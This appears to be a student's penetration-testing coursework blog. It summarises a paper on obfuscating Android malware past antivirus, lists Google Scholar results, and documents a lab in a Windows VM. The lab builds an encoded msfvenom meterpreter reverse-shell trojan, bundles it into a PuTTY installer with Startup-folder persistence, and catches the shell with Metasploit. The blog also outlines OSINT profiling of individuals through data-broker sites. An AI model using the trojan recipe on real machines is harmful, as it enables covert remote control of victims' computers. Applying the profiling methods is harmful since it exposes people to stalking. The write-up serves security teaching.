Read an article from Google Scholar. What did you learn?
I read “On the Evaluation of Android Malware Detectors (26.6.2018)” by Hassan Rafiq, Muhammad Aleem and Muhammad Arshad Islam.
The writers tested how well Android virus detectors can detect malware with obfuscated source code. The testing was done against a number of commercial Android antivirus apps using previously known malware samples with source code obfuscated using various obfuscation methods. The results, at least from the point of the malware detection, weren’t great: it took, at most, application of three different obfuscation methods to get past any of the tested antivirus software.
What I found interesting in the article were the six different obfuscation methods tested:
- Variable renaming
- Package renaming
- Method renaming
- Garbage insertion
- Call indirection
The first three are pretty self-explanatory: rename variables, packages (manifest file) and methods of the malware apk.
Garbage insertion means inserting useless code into the malware application i.e, while-loops that the program never enters. The inserted code shouldn’t affect the way the rest of the code works.
Rebuilding is taking the malware app, decompiling it and then recompiling it again. This changes the byte order and hash value of the app. This fools the malware detection if it relies on hash signatures.
Call indirection means that a method call is moved into a new method, which is then called in place of the original method.
Based on this article it doesn’t seem that getting past antivirus software would be that difficult, especially when it contains parts like this:
“... we may conclude that the Norton antivirus is a hard nut to crack because it can only be evaded if complex obfuscation is applied to a malware sample i.e., a combination of variable renaming, method renaming, and package renaming”.
Now, I could be wrong or misunderstand something, but I don’t think renaming variables, methods and packages of an Android apk would be that hard to do.
The article also mentioned that similar test were done with desktop malware detectors with similar results. It would be really interesting to try out this stuff against PC antivirus software too.
Use Google Scholar to search a topic you’re interested in. What are the five first articles about? Make an alert out of the search.
I decided to stick with pentest and searched using “penetration testing” as the keyword. Unfortunately “penetration testing” is a bit too broad of a search so I added a few other keywords “hacking OR malware OR pentest OR virus "penetration testing"”. The results were bit more accurate so I used that to create the alert.
Sorted by date the five first articles were:
This article is about cracking into wireless network in Kali Linux. It goes through a cracking process and talks about different methods to use. Also, apparently, Kali is pretty good environment for cracking wireless networks.
This one was pretty basic introduction to penetration testing. The writers had also done some pentesting using OpenVAS and Nessus and talked about differences between the two. It read more like an advertisement of the benefits of pentesting.
WLAN technology is fast growing and will replace lots of wired connections. The article talks about some of the vulnerabilities of wireless technology for example vulnerabilities against DoS, Key Reutilization and Downgrade attacks and offers some suggestions to protect against them.
This paper is about a study where a group of teenagers played a cyber security game designed for training undergraduates and professional penetration testers. It features realistic network infrastructure and pentest tools. Even though the game was challenging 61% of the teenagers were interested to learn more about cyber security after the workshop. This suggests that introducing realistic cyber security tools to young people instead of simplified ones might be more beneficial.
Vehicles of today are more and more connected to the internet which means that threats to automotive software security are also bigger and bigger concern. Hacking in to a car remotely and taking control of its software is already a proven possibility.
The article suggests a hackathon, where the goal is to break the existing vehicle software in controlled environment. This would safely reveal the vulnerabilities in the software so that they could then be fixed.
Compile your own Trojan
I booted up a Virtualbox Windows 10 image I got from modern.ie. I downloaded and installed Inno Setup from http://www.jrsoftware.org/isdl.php and downloaded VLC from https://www.videolan.org/vlc/ because I wanted to tie the malware into a legitimate VLC executable. I also turned off Windows Defender.
Using MSFvenom within Kali Linux I created the payload and named it venom_malware.exe
sudo msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.84 LPORT=4444 -e x86/shikata_ga_nai -i 10 -b "\x00" -f exe -o venom_malware.exe
I started Apache
sudo apache2ctl start
created a new folder in /var/www/html called “asd”, copied venom_malware.exe into it,
sudo scp venom_malware.exe /var/www/html/asd/
downloaded the file to the virtual Windows from “my ip”/asd and stopped Apache just in case
sudo apache2ctl stop
I then ran Inno Setup that I had previously installed on the virtual machine.
I decided to “Create a new script file using the Script Wizard”. I left every setting as the default one until I got to the “Application Files” part. There I chose the VLC installer as the main executable and my venom_malware.exe payload as other application file.
I then again left everything as is until Compiler Settings. I saved the output on to desktop and named it vlc_malware_setup and clicked through the rest of the wizard. The vlc_malware_setup file appeared on the desktop.
Back at Kali, I set up Metasploit to listen for the connection
msfconsole use multi/handler set payload windows/meterpreter/reverse_tcp set lhost “IP” set lport 4444 exploit
and returned to the virtual machine.
I had to run the installer as an admin to get the VLC installer to start. VLC installed just fine but the Meterpreter wouldn’t connect. I tried to re-package the malware and VLC using venom_malware.exe as the main executable and VLC as the other application file. This time the VLC installation wasn’t anywhere to be seen but I got the Meterpreter connection when I launched the app that the installer spat out.
I thought that maybe the problem was that I was using VLC installer file so I downloaded 32 bit putty.exe from https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html and tried again with that. The results were the same.
I was at this point when I realized I had thought this all wrong. I wanted to make the malware start when the user ran VLC (or Putty) but clearly the better choice was to make the malware run at the system startup.
So I went through the Inno Setup again. Used putty.exe as the main executable and venom_malware.exe as the other application file. I clicked “Edit”, picked “(Custom)” under the Destination base folder and typed in C:\programdata\Microsoft\Windows\Start Menu\Programs\StartUp. This time I didn’t try to make the trojan launch at the same time with the installer or anything like that. It should only launch when Windows is restarted.
To test this I signed out and back again and after couple of seconds the Meterpreter connection was established.
The Putty app probably isn’t the best choice to couple the payload with since it is a stand alone executable. I think I could’ve maybe unpacked the VLC installer, slipped in the payload and repacked it to make my malware a little bit stealthier.
In what ways can you find information about people using open sources
Ways to gather information using open sources:
search engines search for name, online hande/s, email, phone number or anything else you know already
social media i.e. Facebook, Twitter, LinkedIn, Instagram etc.
public records tax records, criminal records, phone records, location
reverse image search
Use all info you’ll find about your target to make more searches, like jobs (past and present), education, hobbies, friends and family etc.
I also took a look at https://inteltechniques.com a website with lots of different search tools. It uses United States public records so it’s quite USA centric in parts, but things like Twitter and Facebook searches obviously work well even when looking for person outside USA.
I used the “NAME” section to look for information of an American person. I looked at couple of the links which took me to these slightly suspicious looking websites with lots of loading bars and buttons to click. Those sites like to make you wait for them to “gather information” or “compile records” or whatever and ask for credit card afterwards to view the info, but even without giving your credit card number, they tend to reveal quite a lot about a person.
- Lenovo Ideapad 720s
- Kali Xfce 64 live usb
- Intel Core i7-8550U
- GeForce MX150
- 8 GB RAM
- 500 GB SSD